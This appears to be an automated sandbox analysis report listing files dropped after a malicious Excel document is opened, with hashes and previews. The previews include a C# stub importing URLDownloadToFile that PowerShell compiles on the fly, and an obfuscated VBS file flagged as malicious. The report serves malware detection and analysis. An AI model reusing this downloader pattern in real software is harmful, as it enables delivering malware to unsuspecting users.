                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\drzpuovq.4tc.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\g1iqzbhj.po2.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\gbyc5wn5.4s2.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\hwm1ljy5.scq.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\n44dq5mh.ppg.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:MSVC .res
                                                  Category:dropped
                                                  Size (bytes):652
                                                  Entropy (8bit):3.127317571933919
                                                  Encrypted:false
                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryzlfak7YnqqwlYPN5Dlq5J:+RI+ycuZhNzakSlPNnqX
                                                  MD5:D199953CE797746A1D6F89C4E4626E96
                                                  SHA1:D4422A2134F5165E01069E359F3878045FC8A845
                                                  SHA-256:E0A687E0EB36EE82EFCEFE35FDC6EE1FDC9E37394451D543DAC8E27E393FA0CB
                                                  SHA-512:BFCB5B9B4199BA779A68873B11C6F3A8379C7A8C58E82F03F8113420524344DCD8351981AE8E20F4089ED48028347507E5BA1A775BA8D4116C0CC46A54BE5B71
                                                  Malicious:false
                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.3.q.1.2.j.m.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.3.q.1.2.j.m.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                  C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.0.cs

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (348)
                                                  Category:dropped
                                                  Size (bytes):468
                                                  Entropy (8bit):3.816942936139208
                                                  Encrypted:false
                                                  SSDEEP:6:V/DsYLDS81zu840gElFVMmFnQXReKJ8SRHy4HttmDZf/5IOs1eYy:V/DTLDfu2fUXfHMRIOKeYy
                                                  MD5:8EC70363397A774E14B716C7EF51ABB6
                                                  SHA1:A966DB39ACEC786DE5A04960C81B9133EBE14F3E
                                                  SHA-256:2B3045FEB8ECAC01126519F49D1D27FC6D3CFF70140DA11BCC7CD0334671E5CE
                                                  SHA-512:04064F6B95DC606553C2723A2962BE61819E1D3BBEEC34F99089C28FA0F1CC8D1FAC10D0266BE29899C2AE55026E199500B49E8D1D7FCFF10F9A580DFAC9D916
                                                  Malicious:false
                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace RwUGrR.{. public class hWrdxmUaWg. {. [DllImport("UrLMoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr yjBGU,string fr,string DEq,uint nTGyTsAmGik,IntPtr KAFK);.. }..}.

                                                  C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):369
                                                  Entropy (8bit):5.294237009014045
                                                  Encrypted:false
                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fHgtOtVH0zxs7+AEszIP23fHgtOthLBHn:p37Lvkmb6KzPCQt0WZEoPCQPn
                                                  MD5:B980D551FCEA2449DF8968EDF7681FDF
                                                  SHA1:FEB92AA3037285D793659D08C9C43FD2C0FC655B
                                                  SHA-256:6606BA7945849A9269B0038260B4FE82FACF9D4BA4182A2AC91086475FA1510B
                                                  SHA-512:29125ADF3DC8BA54653DEABB0EB0A17E33168BFF38596D48F3E8C1CD90DA46182D78AD2DE6221CFC5E2E9B0D995696A98049134B2CC8705824013E22CFB2E99C
                                                  Malicious:true
                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.0.cs"

                                                  C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.dll

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3072
                                                  Entropy (8bit):2.8247167245001634
                                                  Encrypted:false
                                                  SSDEEP:24:etGSVlWPBG5eM7p8amzkwlAU6LDtkZfOAt5qhkWI+ycuZhNzakSlPNnq:6P9sM+ayAU6mJdt5EH1ulza3/q
                                                  MD5:910E38E5170A66C359CCACCB50F1D718
                                                  SHA1:6ADEBE44182C846E04BF03A53E38BBCDFF02945E
                                                  SHA-256:9AD22285C50F5F20103241D802CC7C8334D258E04CD9FDC9203C75DD302F56A3
                                                  SHA-512:A92E11FA92F230D92DF78AF5CBC928B0E10BBFEA9965DAA3588F4789770C5E5FB85E65C1B0B643259334021D301850FA0EBDF12DE4FDB55A5AE961787580418F
                                                  Malicious:false
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....RMg...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................9.2.....v.....v...........................".............. @.....P ......R.........X.....^.....a.....e.....q...R.....R...!.R.....R.......!.....*.......@.......................................)..........<Module>.r3

                                                  C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.out

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                  Category:modified
                                                  Size (bytes):866
                                                  Entropy (8bit):5.369644379355019
                                                  Encrypted:false
                                                  SSDEEP:24:AId3ka6KzPXEoPaKaMD5DqBVKVrdFAMBJTH:Akka60/EoSKdDcVKdBJj
                                                  MD5:6A2D10E5FED4842C71A891840CB06ABA
                                                  SHA1:9A1BB1988F77776AEB22E612D79DA8407CA94A53
                                                  SHA-256:6F1ED043F904205D01C6B70FC1A0B72E41EBAFC08810F8A8471763B1837F5B04
                                                  SHA-512:C8259DE66F75FA2F963AA0365B19DAE2FF885E75D5DB6E091058B4183D157FBEF28E5C92E03D99F4090C6BD525499B4257D64CD614C34481A48ABE1C6D4AA283
                                                  Malicious:false
                                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                  C:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:MSVC .res
                                                  Category:dropped
                                                  Size (bytes):652
                                                  Entropy (8bit):3.1339381716844
                                                  Encrypted:false
                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryqUak7Ynqqh5PN5Dlq5J:+RI+ycuZhNAUakSh5PNnqX
                                                  MD5:8A1E884DBDEF442A124520F7E3674D36
                                                  SHA1:E63D8DC44C03279E61F7C178E4F9BAE97856B7CD
                                                  SHA-256:CFFDFAF9138B6A7E6BB12EFAD809F6795B2663E0F962BB6CE99353BC819902B5
                                                  SHA-512:FE554F7F072BC11E1C566E4E27463C1C0E913D2A1D553C43BBA9A10BBCB70FAA4178FC78178D70FECFA15277094602710D9E2C34893DB8A9224D9A665C5FD293
                                                  Malicious:false
                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.m.q.w.3.5.t.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.m.q.w.3.5.t.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                  C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.0.cs

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (348)
                                                  Category:dropped
                                                  Size (bytes):468
                                                  Entropy (8bit):3.816942936139208
                                                  Encrypted:false
                                                  SSDEEP:6:V/DsYLDS81zu840gElFVMmFnQXReKJ8SRHy4HttmDZf/5IOs1eYy:V/DTLDfu2fUXfHMRIOKeYy
                                                  MD5:8EC70363397A774E14B716C7EF51ABB6
                                                  SHA1:A966DB39ACEC786DE5A04960C81B9133EBE14F3E
                                                  SHA-256:2B3045FEB8ECAC01126519F49D1D27FC6D3CFF70140DA11BCC7CD0334671E5CE
                                                  SHA-512:04064F6B95DC606553C2723A2962BE61819E1D3BBEEC34F99089C28FA0F1CC8D1FAC10D0266BE29899C2AE55026E199500B49E8D1D7FCFF10F9A580DFAC9D916
                                                  Malicious:false
                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace RwUGrR.{. public class hWrdxmUaWg. {. [DllImport("UrLMoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr yjBGU,string fr,string DEq,uint nTGyTsAmGik,IntPtr KAFK);.. }..}.

                                                  C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):369
                                                  Entropy (8bit):5.295300507340753
                                                  Encrypted:false
                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fxyLzxs7+AEszIP23fxyFA:p37Lvkmb6Kz5yLWZEo5ym
                                                  MD5:AE4A769845E9CBDA5C6E135272EE0FAA
                                                  SHA1:9A55C4B69183095622DF365A76386443060F5021
                                                  SHA-256:613DAE582C4AFA35125E6A1626F46FBC511B8EAB798D1328D2F9E54B9CD0ECC8
                                                  SHA-512:DC0E523B5BAD065F3DC82451CE79F3D11E147A7F0038AB5116601FC3C04F28E92840B19B0461258BF34B8DC717AC759517179261BE742C1839DDDB9B015723CE
                                                  Malicious:false
                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.0.cs"

                                                  C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.dll

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3072
                                                  Entropy (8bit):2.8318090869619623
                                                  Encrypted:false
                                                  SSDEEP:24:etGSNNtlWPBG5eM7p8amzkwlAUuXLDtkZfbpwqhkWI+ycuZhNAUakSh5PNnq:679sM+ayAUuXmJbpwEH1ulAUa3h7q
                                                  MD5:F2C4893D72C567DEEA1832BC806496FD
                                                  SHA1:204B67D5B242FD52E1D2A2EEB3BDA815838FD0CF
                                                  SHA-256:A430788F22F62DCF42121845864F9FFAC99DBAAA4B24E00B747556A3F40B0965
                                                  SHA-512:6317E003650EA20473F5DF5F343F1898B8E3E82520A9828C895A52BB372A337F5723B89483E78760A3D2A19805CA12D3E592A10A54FACE5E6F3D9E62F0F68101
                                                  Malicious:false
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....RMg...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................9.2.....v.....v...........................".............. @.....P ......R.........X.....^.....a.....e.....q...R.....R...!.R.....R.......!.....*.......@.......................................)..........<Module>.xm

                                                  C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.out

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                  Category:modified
                                                  Size (bytes):866
                                                  Entropy (8bit):5.372511038622708
                                                  Encrypted:false
                                                  SSDEEP:24:AId3ka6Kz5yoEo5ynKaMD5DqBVKVrdFAMBJTH:Akka60HEoKKdDcVKdBJj
                                                  MD5:7CB7B28D4DEEA361925538543C3645DC
                                                  SHA1:D730AAD00985E691D4D8B43C8D3528004AD5CA81
                                                  SHA-256:45C0C81378299CCC36B4B8F9D20772F509823D2D1BDE415A9A0E4600534D4E33
                                                  SHA-512:AB4EC5654C7D4E51E8B325EB426FDE5174C487B366CE38A3FD390C2E6D0FB13A5AA30564C0A8BB65ADA33212AB6562019D4A51376E1F0980F752372141847D30
                                                  Malicious:false
                                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                  C:\Users\user\AppData\Local\Temp\zh1bgx2j.xut.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\~DF47D597805C4E33C7.TMP

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\~DF77F41D790A6A1D9F.TMP

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\~DFC9817EE2022F4CEE.TMP

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (3453), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):154384
                                                  Entropy (8bit):3.8033508297517873
                                                  Encrypted:false
                                                  SSDEEP:3072:ECFOB9LjxbTAKZGEDqmCFOB9LjxbTAKZGEDMCFOB9LjxbTAKZGEDP:EcoBWKZGEDqmcoBWKZGEDMcoBWKZGEDP
                                                  MD5:297E6244E9EDCAEB8B1F6705E40CB51D
                                                  SHA1:230882871D7FF55237292422E02EEF841CF5F21E
                                                  SHA-256:9CCE8E2B2E0A7512420E3C93DEC3B33DB128D7FD694F6FC9AE1C8C9FF9817365
                                                  SHA-512:F722D14668F8B75AB7B2DB08FF3A2D2B85007C8902E213B094C24DB2694E785AFF8D41F0117E18414E4807AA30BA2A57C01C16186B046B23C64E7F4320D972AE
                                                  Malicious:true
                                                  Preview:...... . . . .....Q.k.i.x.m.W.O.c.e.K.O.z.a.U.i. .=. .".j.W.W.L.N.q.L.L.Z.S.T.j.J.n.h.".....h.N.L.W.d.i.k.L.k.j.U.p.e.P.K. .=. .".P.C.l.a.h.f.W.L.d.z.c.G.L.O.h.".....e.a.q.A.q.s.K.W.K.W.i.e.m.h.C. .=. .".o.L.s.O.k.N.A.t.k.L.N.p.g.u.I.".........q.P.d.P.P.Q.m.t.x.W.B.R.o.L.W. .=. .".W.f.B.z.R.l.Z.c.W.U.N.S.A.i.q.".....T.U.c.N.i.e.L.t.U.L.z.B.i.O.A. .=. .".p.h.L.N.m.i.b.O.N.t.o.e.U.Z.P.".....B.W.n.L.t.A.u.b.L.W.u.f.c.a.G. .=. .".L.c.U.n.h.L.o.k.n.L.L.Z.G.o.T.".....N.J.z.W.W.Z.f.x.L.N.W.a.Z.h.A. .=. .".p.G.N.p.G.C.f.t.H.L.e.h.L.K.p.".....c.e.h.l.P.Q.P.t.k.z.S.Z.k.A.e. .=. .".B.K.N.i.i.K.U.q.c.W.m.B.i.e.c.".....b.k.o.v.K.L.h.K.A.P.W.K.L.K.U. .=. .".l.i.G.l.d.C.f.W.B.c.e.c.c.h.z.".....U.A.u.u.B.g.s.R.L.S.Q.G.Q.L.H. .=. .".P.W.L.k.f.K.h.h.W.A.W.g.L.L.Z.".....u.W.k.e.i.W.i.U.K.L.h.l.W.k.q. .=. .".L.W.o.T.K.B.L.Q.L.o.b.c.x.a.G.".....K.p.m.p.K.L.L.m.i.e.c.i.v.L.L. .=. .".Z.L.K.O.q.k.f.h.u.e.L.B.Z.Q.L.".....O.N.k.C.f.h.N.W.G.u.W.e.L.W.T. .=. .".k.W.N.f.p.z.L.t.O.K.v.l.L.e.C.".....d.K.k.t.U.U.G.U.

                                                  C:\Users\user\Desktop\09230000

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 2 06:24:53 2024, Security: 1
                                                  Category:dropped
                                                  Size (bytes):988160
                                                  Entropy (8bit):7.757867987862203
                                                  Encrypted:false
                                                  SSDEEP:12288:/SmzHJEUiOIBUzMTS7D3DERnLRmF8DhEPWxpsAQx1Zj+jYEPO5X79mP8sTm+WDF9:tBaybARM8Aw8Z+jPOp79mQTFqja
                                                  MD5:A45CF6FD74DC6D289240651822BFBACA
                                                  SHA1:646BFA8A27C92ACF95A74E56383125BBF43FFFC8
                                                  SHA-256:2170DE0D94AEEEFA0D82131F4EA9588998B0296D53D9891C0D4CA5A14BBB7F52
                                                  SHA-512:5A4D62F599CD68E5F3E19D46174E9EF9BB64456C066727D30613FCD9ADB0A0138E30365B5933C662BC44E8CF63D5DCDD5C55E3395F3BFB72245A7FB35CAD40C6
                                                  Malicious:false
                                                  Preview:......................>.......................................................................5...6...7...............g.......i.......k...............................................................................................................................................................................................................................................................................................................................................................................................4...B............................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                  C:\Users\user\Desktop\09230000:Zone.Identifier

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:false
